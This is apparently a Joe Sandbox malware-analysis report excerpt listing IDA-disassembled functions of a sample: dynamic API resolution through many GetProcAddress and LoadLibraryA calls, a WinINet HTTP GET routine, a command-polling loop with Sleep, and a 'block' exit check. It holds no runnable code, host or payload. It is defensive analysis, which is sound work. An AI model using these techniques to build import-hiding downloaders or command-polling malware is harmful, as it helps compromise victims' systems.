                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: fad2e512a7905643431189ed152adeddb4ea6c1149a214913812ac577592a821
                            • Instruction ID: 60b35a0515792a522096d716403202fc93697222079c144a2416af8b2b77113d
                            • Opcode Fuzzy Hash: fad2e512a7905643431189ed152adeddb4ea6c1149a214913812ac577592a821
                            • Instruction Fuzzy Hash: CBD05E7490030CDBCB04EFE0D889AEDBB78FB48321F000954D94562340EA315491CAA6
                            Function 00609C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 609c10-609c1a 634 609c20-60a031 GetProcAddress * 43 633->634 635 60a036-60a0ca LoadLibraryA * 8 633->635 634->635 636 60a146-60a14d 635->636 637 60a0cc-60a141 GetProcAddress * 5 635->637 638 60a153-60a211 GetProcAddress * 8 636->638 639 60a216-60a21d 636->639 637->636 638->639 640 60a298-60a29f 639->640 641 60a21f-60a293 GetProcAddress * 5 639->641 642 60a2a5-60a332 GetProcAddress * 6 640->642 643 60a337-60a33e 640->643 641->640 642->643 644 60a344-60a41a GetProcAddress * 9 643->644 645 60a41f-60a426 643->645 644->645 646 60a4a2-60a4a9 645->646 647 60a428-60a49d GetProcAddress * 5 645->647 648 60a4ab-60a4d7 GetProcAddress * 2 646->648 649 60a4dc-60a4e3 646->649 647->646 648->649 650 60a515-60a51c 649->650 651 60a4e5-60a510 GetProcAddress * 2 649->651 652 60a612-60a619 650->652 653 60a522-60a60d GetProcAddress * 10 650->653 651->650 654 60a61b-60a678 GetProcAddress * 4 652->654 655 60a67d-60a684 652->655 653->652 654->655 656 60a686-60a699 GetProcAddress 655->656 657 60a69e-60a6a5 655->657 656->657 658 60a6a7-60a703 GetProcAddress * 4 657->658 659 60a708-60a709 657->659 658->659
                            APIs
                            • GetProcAddress.KERNEL32(75900000,013F65A0), ref: 00609C2D
                            • GetProcAddress.KERNEL32(75900000,013F64E0), ref: 00609C45
                            • GetProcAddress.KERNEL32(75900000,01408F40), ref: 00609C5E
                            • GetProcAddress.KERNEL32(75900000,01408EF8), ref: 00609C76
                            • GetProcAddress.KERNEL32(75900000,0140CA30), ref: 00609C8E
                            • GetProcAddress.KERNEL32(75900000,0140C988), ref: 00609CA7
                            • GetProcAddress.KERNEL32(75900000,013FAFC8), ref: 00609CBF
                            • GetProcAddress.KERNEL32(75900000,0140C838), ref: 00609CD7
                            • GetProcAddress.KERNEL32(75900000,0140C880), ref: 00609CF0
                            • GetProcAddress.KERNEL32(75900000,0140CA48), ref: 00609D08
                            • GetProcAddress.KERNEL32(75900000,0140C9A0), ref: 00609D20
                            • GetProcAddress.KERNEL32(75900000,013F64C0), ref: 00609D39
                            • GetProcAddress.KERNEL32(75900000,013F65C0), ref: 00609D51
                            • GetProcAddress.KERNEL32(75900000,013F62A0), ref: 00609D69
                            • GetProcAddress.KERNEL32(75900000,013F63E0), ref: 00609D82
                            • GetProcAddress.KERNEL32(75900000,0140CA60), ref: 00609D9A
                            • GetProcAddress.KERNEL32(75900000,0140C8C8), ref: 00609DB2
                            • GetProcAddress.KERNEL32(75900000,013FB180), ref: 00609DCB
                            • GetProcAddress.KERNEL32(75900000,013F62C0), ref: 00609DE3
                            • GetProcAddress.KERNEL32(75900000,0140C928), ref: 00609DFB
                            • GetProcAddress.KERNEL32(75900000,0140C850), ref: 00609E14
                            • GetProcAddress.KERNEL32(75900000,0140CAA8), ref: 00609E2C
                            • GetProcAddress.KERNEL32(75900000,0140C7F0), ref: 00609E44
                            • GetProcAddress.KERNEL32(75900000,013F64A0), ref: 00609E5D
                            • GetProcAddress.KERNEL32(75900000,0140CA78), ref: 00609E75
                            • GetProcAddress.KERNEL32(75900000,0140CA00), ref: 00609E8D
                            • GetProcAddress.KERNEL32(75900000,0140C9B8), ref: 00609EA6
                            • GetProcAddress.KERNEL32(75900000,0140CAC0), ref: 00609EBE
                            • GetProcAddress.KERNEL32(75900000,0140C940), ref: 00609ED6
                            • GetProcAddress.KERNEL32(75900000,0140C8E0), ref: 00609EEF
                            • GetProcAddress.KERNEL32(75900000,0140C868), ref: 00609F07
                            • GetProcAddress.KERNEL32(75900000,0140CA90), ref: 00609F1F
                            • GetProcAddress.KERNEL32(75900000,0140CAD8), ref: 00609F38
                            • GetProcAddress.KERNEL32(75900000,01409A38), ref: 00609F50
                            • GetProcAddress.KERNEL32(75900000,0140C808), ref: 00609F68
                            • GetProcAddress.KERNEL32(75900000,0140C958), ref: 00609F81
                            • GetProcAddress.KERNEL32(75900000,013F6500), ref: 00609F99
                            • GetProcAddress.KERNEL32(75900000,0140C898), ref: 00609FB1
                            • GetProcAddress.KERNEL32(75900000,013F6360), ref: 00609FCA
                            • GetProcAddress.KERNEL32(75900000,0140C8B0), ref: 00609FE2
                            • GetProcAddress.KERNEL32(75900000,0140CA18), ref: 00609FFA
                            • GetProcAddress.KERNEL32(75900000,013F6380), ref: 0060A013
                            • GetProcAddress.KERNEL32(75900000,013F6400), ref: 0060A02B
                            • LoadLibraryA.KERNEL32(0140C9D0,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A03D
                            • LoadLibraryA.KERNEL32(0140C820,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A04E
                            • LoadLibraryA.KERNEL32(0140C8F8,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A060
                            • LoadLibraryA.KERNEL32(0140C9E8,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A072
                            • LoadLibraryA.KERNEL32(0140C910,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A083
                            • LoadLibraryA.KERNEL32(0140C970,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A095
                            • LoadLibraryA.KERNEL32(0140CC40,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A0A7
                            • LoadLibraryA.KERNEL32(0140CD90,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A0B8
                            • GetProcAddress.KERNEL32(75FD0000,013F6920), ref: 0060A0DA
                            • GetProcAddress.KERNEL32(75FD0000,0140CCE8), ref: 0060A0F2
                            • GetProcAddress.KERNEL32(75FD0000,014088F0), ref: 0060A10A
                            • GetProcAddress.KERNEL32(75FD0000,0140CB68), ref: 0060A123
                            • GetProcAddress.KERNEL32(75FD0000,013F6A00), ref: 0060A13B
                            • GetProcAddress.KERNEL32(734B0000,013FB1A8), ref: 0060A160
                            • GetProcAddress.KERNEL32(734B0000,013F68E0), ref: 0060A179
                            • GetProcAddress.KERNEL32(734B0000,013FB0B8), ref: 0060A191
                            • GetProcAddress.KERNEL32(734B0000,0140CC10), ref: 0060A1A9
                            • GetProcAddress.KERNEL32(734B0000,0140CAF0), ref: 0060A1C2
                            • GetProcAddress.KERNEL32(734B0000,013F6860), ref: 0060A1DA
                            • GetProcAddress.KERNEL32(734B0000,013F6760), ref: 0060A1F2
                            • GetProcAddress.KERNEL32(734B0000,0140CC88), ref: 0060A20B
                            • GetProcAddress.KERNEL32(763B0000,013F6740), ref: 0060A22C
                            • GetProcAddress.KERNEL32(763B0000,013F6720), ref: 0060A244
                            • GetProcAddress.KERNEL32(763B0000,0140CD60), ref: 0060A25D
                            • GetProcAddress.KERNEL32(763B0000,0140CBE0), ref: 0060A275
                            • GetProcAddress.KERNEL32(763B0000,013F6880), ref: 0060A28D
                            • GetProcAddress.KERNEL32(750F0000,013FB2C0), ref: 0060A2B3
                            • GetProcAddress.KERNEL32(750F0000,013FB270), ref: 0060A2CB
                            • GetProcAddress.KERNEL32(750F0000,0140CD78), ref: 0060A2E3
                            • GetProcAddress.KERNEL32(750F0000,013F69E0), ref: 0060A2FC
                            • GetProcAddress.KERNEL32(750F0000,013F68A0), ref: 0060A314
                            • GetProcAddress.KERNEL32(750F0000,013FB0E0), ref: 0060A32C
                            • GetProcAddress.KERNEL32(75A50000,0140CDC0), ref: 0060A352
                            • GetProcAddress.KERNEL32(75A50000,013F66C0), ref: 0060A36A
                            • GetProcAddress.KERNEL32(75A50000,01408850), ref: 0060A382
                            • GetProcAddress.KERNEL32(75A50000,0140CC58), ref: 0060A39B
                            • GetProcAddress.KERNEL32(75A50000,0140CCD0), ref: 0060A3B3
                            • GetProcAddress.KERNEL32(75A50000,013F6A20), ref: 0060A3CB
                            • GetProcAddress.KERNEL32(75A50000,013F66E0), ref: 0060A3E4
                            • GetProcAddress.KERNEL32(75A50000,0140CDA8), ref: 0060A3FC
                            • GetProcAddress.KERNEL32(75A50000,0140CDD8), ref: 0060A414
                            • GetProcAddress.KERNEL32(75070000,013F6680), ref: 0060A436
                            • GetProcAddress.KERNEL32(75070000,0140CB20), ref: 0060A44E
                            • GetProcAddress.KERNEL32(75070000,0140CB08), ref: 0060A466
                            • GetProcAddress.KERNEL32(75070000,0140CBC8), ref: 0060A47F
                            • GetProcAddress.KERNEL32(75070000,0140CD00), ref: 0060A497
                            • GetProcAddress.KERNEL32(74E50000,013F67E0), ref: 0060A4B8
                            • GetProcAddress.KERNEL32(74E50000,013F66A0), ref: 0060A4D1
                            • GetProcAddress.KERNEL32(75320000,013F68C0), ref: 0060A4F2
                            • GetProcAddress.KERNEL32(75320000,0140CBB0), ref: 0060A50A
                            • GetProcAddress.KERNEL32(6F060000,013F6700), ref: 0060A530
                            • GetProcAddress.KERNEL32(6F060000,013F6820), ref: 0060A548
                            • GetProcAddress.KERNEL32(6F060000,013F6980), ref: 0060A560
                            • GetProcAddress.KERNEL32(6F060000,0140CB38), ref: 0060A579
                            • GetProcAddress.KERNEL32(6F060000,013F6780), ref: 0060A591
                            • GetProcAddress.KERNEL32(6F060000,013F67A0), ref: 0060A5A9
                            • GetProcAddress.KERNEL32(6F060000,013F67C0), ref: 0060A5C2
                            • GetProcAddress.KERNEL32(6F060000,013F6800), ref: 0060A5DA
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0060A5F1
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0060A607
                            • GetProcAddress.KERNEL32(74E00000,0140CBF8), ref: 0060A629
                            • GetProcAddress.KERNEL32(74E00000,01408910), ref: 0060A641
                            • GetProcAddress.KERNEL32(74E00000,0140CB50), ref: 0060A659
                            • GetProcAddress.KERNEL32(74E00000,0140CB80), ref: 0060A672
                            • GetProcAddress.KERNEL32(74DF0000,013F6960), ref: 0060A693
                            • GetProcAddress.KERNEL32(6F9A0000,0140CCA0), ref: 0060A6B4
                            • GetProcAddress.KERNEL32(6F9A0000,013F6840), ref: 0060A6CD
                            • GetProcAddress.KERNEL32(6F9A0000,0140CB98), ref: 0060A6E5
                            • GetProcAddress.KERNEL32(6F9A0000,0140CCB8), ref: 0060A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: cd73409a490ad3f6dcffea36e77490b79142dbf0846a1cfe3da623e33e2df5a4
                            • Instruction ID: 637d21998c58bfc7b59318bec828b2f48000f52966f9c6730aeb789c894ae29f
                            • Opcode Fuzzy Hash: cd73409a490ad3f6dcffea36e77490b79142dbf0846a1cfe3da623e33e2df5a4
                            • Instruction Fuzzy Hash: 8A621AB5505200AFC74CDFA8ED88D663BF9F7EC7017148D2AA6C9C3264D73A9841DB52
                            Function 005F6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 5f6280-5f630b call 60a7a0 call 5f47b0 call 60a740 InternetOpenA StrCmpCA 1040 5f630d 1033->1040 1041 5f6314-5f6318 1033->1041 1040->1041 1042 5f631e-5f6342 InternetConnectA 1041->1042 1043 5f6509-5f6525 call 60a7a0 call 60a800 * 2 1041->1043 1045 5f64ff-5f6503 InternetCloseHandle 1042->1045 1046 5f6348-5f634c 1042->1046 1062 5f6528-5f652d 1043->1062 1045->1043 1047 5f634e-5f6358 1046->1047 1048 5f635a 1046->1048 1050 5f6364-5f6392 HttpOpenRequestA 1047->1050 1048->1050 1052 5f6398-5f639c 1050->1052 1053 5f64f5-5f64f9 InternetCloseHandle 1050->1053 1055 5f639e-5f63bf InternetSetOptionA 1052->1055 1056 5f63c5-5f6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 5f642c-5f644b call 608940 1056->1058 1059 5f6407-5f6427 call 60a740 call 60a800 * 2 1056->1059 1066 5f644d-5f6454 1058->1066 1067 5f64c9-5f64e9 call 60a740 call 60a800 * 2 1058->1067 1059->1062 1069 5f64c7-5f64ef InternetCloseHandle 1066->1069 1070 5f6456-5f6480 InternetReadFile 1066->1070 1067->1062 1069->1053 1073 5f648b 1070->1073 1074 5f6482-5f6489 1070->1074 1073->1069 1074->1073 1078 5f648d-5f64c5 call 60a9b0 call 60a8a0 call 60a800 1074->1078 1078->1070
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                              • Part of subcall function 005F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • InternetOpenA.WININET(00610DFE,00000001,00000000,00000000,00000000), ref: 005F62E1
                            • StrCmpCA.SHLWAPI(?,0140E430), ref: 005F6303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6335
                            • HttpOpenRequestA.WININET(00000000,GET,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F6385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F63BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F63D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005F63FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005F646D
                            • InternetCloseHandle.WININET(00000000), ref: 005F64EF
                            • InternetCloseHandle.WININET(00000000), ref: 005F64F9
                            • InternetCloseHandle.WININET(00000000), ref: 005F6503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: b1763fc8377ff26cac640968802109a61fd7e533e0c0a18cf00ae8a8cff3b43c
                            • Instruction ID: 4825e931fc69550dbe1243b6cc180a0c6205e3ace09168732623454e6d0a1e88
                            • Opcode Fuzzy Hash: b1763fc8377ff26cac640968802109a61fd7e533e0c0a18cf00ae8a8cff3b43c
                            • Instruction Fuzzy Hash: 63713D71A40318ABDF18EBA0DC89FEE7B79BB44700F108598F6096B1D0DBB46A85CF51
                            Function 00605510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 605510-605577 call 605ad0 call 60a820 * 3 call 60a740 * 4 1106 60557c-605583 1090->1106 1107 605585-6055b6 call 60a820 call 60a7a0 call 5f1590 call 6051f0 1106->1107 1108 6055d7-60564c call 60a740 * 2 call 5f1590 call 6052c0 call 60a8a0 call 60a800 call 60aad0 StrCmpCA 1106->1108 1124 6055bb-6055d2 call 60a8a0 call 60a800 1107->1124 1134 605693-6056a9 call 60aad0 StrCmpCA 1108->1134 1138 60564e-60568e call 60a7a0 call 5f1590 call 6051f0 call 60a8a0 call 60a800 1108->1138 1124->1134 1139 6057dc-605844 call 60a8a0 call 60a820 * 2 call 5f1670 call 60a800 * 4 call 606560 call 5f1550 1134->1139 1140 6056af-6056b6 1134->1140 1138->1134 1269 605ac3-605ac6 1139->1269 1142 6057da-60585f call 60aad0 StrCmpCA 1140->1142 1143 6056bc-6056c3 1140->1143 1162 605991-6059f9 call 60a8a0 call 60a820 * 2 call 5f1670 call 60a800 * 4 call 606560 call 5f1550 1142->1162 1163 605865-60586c 1142->1163 1147 6056c5-605719 call 60a820 call 60a7a0 call 5f1590 call 6051f0 call 60a8a0 call 60a800 1143->1147 1148 60571e-605793 call 60a740 * 2 call 5f1590 call 6052c0 call 60a8a0 call 60a800 call 60aad0 StrCmpCA 1143->1148 1147->1142 1148->1142 1246 605795-6057d5 call 60a7a0 call 5f1590 call 6051f0 call 60a8a0 call 60a800 1148->1246 1162->1269 1169 605872-605879 1163->1169 1170 60598f-605a14 call 60aad0 StrCmpCA 1163->1170 1177 6058d3-605948 call 60a740 * 2 call 5f1590 call 6052c0 call 60a8a0 call 60a800 call 60aad0 StrCmpCA 1169->1177 1178 60587b-6058ce call 60a820 call 60a7a0 call 5f1590 call 6051f0 call 60a8a0 call 60a800 1169->1178 1198 605a16-605a21 Sleep 1170->1198 1199 605a28-605a91 call 60a8a0 call 60a820 * 2 call 5f1670 call 60a800 * 4 call 606560 call 5f1550 1170->1199 1177->1170 1275 60594a-60598a call 60a7a0 call 5f1590 call 6051f0 call 60a8a0 call 60a800 1177->1275 1178->1170 1198->1106 1199->1269 1246->1142 1275->1170
                            APIs
                              • Part of subcall function 0060A820: lstrlen.KERNEL32(005F4F05,?,?,005F4F05,00610DDE), ref: 0060A82B
                              • Part of subcall function 0060A820: lstrcpy.KERNEL32(00610DDE,00000000), ref: 0060A885
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006056A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605857
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 006051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605228
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 006052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605318
                              • Part of subcall function 006052C0: lstrlen.KERNEL32(00000000), ref: 0060532F
                              • Part of subcall function 006052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00605364
                              • Part of subcall function 006052C0: lstrlen.KERNEL32(00000000), ref: 00605383
                              • Part of subcall function 006052C0: lstrlen.KERNEL32(00000000), ref: 006053AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0060578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00605A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 20affdf4a6af844ebff306a30938b095f3ef9b74e64371dc7337c09245e7506d
                            • Instruction ID: 264df64fd2835cf5439b6f3362c5b22813c370f8325f592869879f7fdb0cf188
                            • Opcode Fuzzy Hash: 20affdf4a6af844ebff306a30938b095f3ef9b74e64371dc7337c09245e7506d
                            • Instruction Fuzzy Hash: 81E11D719502089ADB4CFBE0DC56EEF733ABB94340F40852CB507661D1EF34AA49CBA6
                            Function 006017A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 6017a0-6017cd call 60aad0 StrCmpCA 1304 6017d7-6017f1 call 60aad0 1301->1304 1305 6017cf-6017d1 ExitProcess 1301->1305 1309 6017f4-6017f8 1304->1309 1310 6019c2-6019cd call 60a800 1309->1310 1311 6017fe-601811 1309->1311 1313 601817-60181a 1311->1313 1314 60199e-6019bd 1311->1314 1316 601821-601830 call 60a820 1313->1316 1317 601849-601858 call 60a820 1313->1317 1318 6018ad-6018be StrCmpCA 1313->1318 1319 6018cf-6018e0 StrCmpCA 1313->1319 1320 60198f-601999 call 60a820 1313->1320 1321 601970-601981 StrCmpCA 1313->1321 1322 6018f1-601902 StrCmpCA 1313->1322 1323 601951-601962 StrCmpCA 1313->1323 1324 601932-601943 StrCmpCA 1313->1324 1325 601913-601924 StrCmpCA 1313->1325 1326 601835-601844 call 60a820 1313->1326 1327 60185d-60186e StrCmpCA 1313->1327 1328 60187f-601890 StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1333 6018c0-6018c3 1318->1333 1334 6018ca 1318->1334 1335 6018e2-6018e5 1319->1335 1336 6018ec 1319->1336 1320->1314 1346 601983-601986 1321->1346 1347 60198d 1321->1347 1337 601904-601907 1322->1337 1338 60190e 1322->1338 1343 601964-601967 1323->1343 1344 60196e 1323->1344 1341 601945-601948 1324->1341 1342 60194f 1324->1342 1339 601930 1325->1339 1340 601926-601929 1325->1340 1326->1314 1329 601870-601873 1327->1329 1330 60187a 1327->1330 1331 601892-60189c 1328->1331 1332 60189e-6018a1 1328->1332 1329->1330 1330->1314 1352 6018a8 1331->1352 1332->1352 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1314 1340->1339 1341->1342 1342->1314 1343->1344 1344->1314 1346->1347 1347->1314 1352->1314
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 006017C5
                            • ExitProcess.KERNEL32 ref: 006017D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
